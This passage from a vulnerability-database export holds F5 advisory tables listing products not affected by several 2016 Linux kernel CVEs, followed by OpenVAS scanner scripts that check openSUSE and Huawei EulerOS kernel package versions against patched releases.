vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.1| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-09-28T00:24:00", "published": "2016-11-07T20:10:00", "href": "https://support.f5.com/csp/article/K02254805", "id": "F5:K02254805", "type": "f5", "title": "InfiniBand vulnerability in the Linux kernel CVE-2016-4565", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-07T17:27:05", "bulletinFamily": "software", "cvelist": ["CVE-2016-4565"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-11-07T00:00:00", "published": "2016-11-07T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/02/sol02254805.html", "id": "SOL02254805", "title": "SOL02254805 - InfiniBand vulnerability in the Linux Kernel CVE-2016-4565", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-13T22:31:14", "bulletinFamily": "software", "cvelist": ["CVE-2016-1583", "CVE-2016-2143"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:31:00", "published": "2017-03-07T20:55:00", "id": "F5:K10515241", "href": "https://support.f5.com/csp/article/K10515241", "title": "Linux kernel vulnerabilities CVE-2016-1583 and CVE-2016-2143", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-31T18:35:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5244", "CVE-2016-4581", "CVE-2016-2053", "CVE-2016-4557", "CVE-2016-4951", "CVE-2016-4486", "CVE-2016-1583", "CVE-2016-0758", "CVE-2016-4569", "CVE-2016-3955", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4805", "CVE-2013-7446", "CVE-2016-4565", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-3134"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-06-22T00:00:00", "id": "OPENVAS:1361412562310851349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851349", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:1641-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851349\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-06-22 05:29:14 +0200 (Wed, 22 Jun 2016)\");\n script_cve_id(\"CVE-2013-7446\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\",\n \"CVE-2016-3134\", \"CVE-2016-3672\", \"CVE-2016-3955\", \"CVE-2016-4482\",\n \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4557\", \"CVE-2016-4565\",\n \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4581\",\n \"CVE-2016-4805\", \"CVE-2016-4951\", \"CVE-2016-5244\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:1641-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.1 kernel was updated to 4.1.26 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does\n not allow it. This could have lead to local privilege escalation when\n ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relies on the write system call, which allows local users to\n cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface. (bsc#979548)\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel allowed local users to\n cause a denial of service (memory corruption and system crash,\n or spinlock) or possibly have unspecified other impact by removing a\n network namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions. (bsc#980371).\n\n - CVE-2016-4951: The tipc_nl_publ_dump function in net/tipc/socket.c in\n the Linux kernel did not verify socket existence, which allowed local\n users to cause a denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a dumpit\n operation. (bsc#981058).\n\n - CVE-2016-5244: An information leak vulnerability in function\n rds_inc_info_copy of file net/rds/recv.c was fixed that might have\n leaked kernel stack data. (bsc#983213).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not properly initialize\n a certain data structure, which allowed attackers to\n obtain sensitive information from kernel stack memory via an X.25 Call\n Request. (bsc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have corrupted pointers\n in asn1_find_indefinite_length (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bnc#955654).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1641-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv\", rpm:\"kernel-pv~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base\", rpm:\"kernel-pv-base~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base-debuginfo\", rpm:\"kernel-pv-base-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debuginfo\", rpm:\"kernel-pv-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debugsource\", rpm:\"kernel-pv-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-devel\", rpm:\"kernel-pv-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa-xen\", rpm:\"kernel-obs-qa-xen~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.1.26~21.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.1.26~21.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.1.26~21.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~4.1.26~21.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5696", "CVE-2016-4470", "CVE-2016-4565"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161043", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2016-1043)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1043\");\n script_version(\"2020-01-23T10:40:08+0000\");\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-4565\", \"CVE-2016-5696\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:40:08 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:40:08 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2016-1043)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1043\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1043\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2016-1043 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network.(CVE-2016-5696)\n\nA flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialised variable would eventually lead to arbitrary free address which could allow attacker to use a use-after-free style attack. (CVE-2016-4470)\n\nA flaw was found in the way certain interfaces of the Linux kernel's Infiniband subsystem used write() as bi-directional ioctl() replacement, which could lead to insufficient memory security checks when being invoked using the splice() system call. A local unprivileged user on a system with either Infiniband hardware present or RDMA Userspace Connection Manager Access module explicitly loaded, could use this flaw to escalate their privileges on the system.(CVE-2016-4565)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.40.1.88\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3961", "CVE-2016-5243", "CVE-2016-4470", "CVE-2016-3134"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-08-11T00:00:00", "id": "OPENVAS:1361412562310842854", "href": 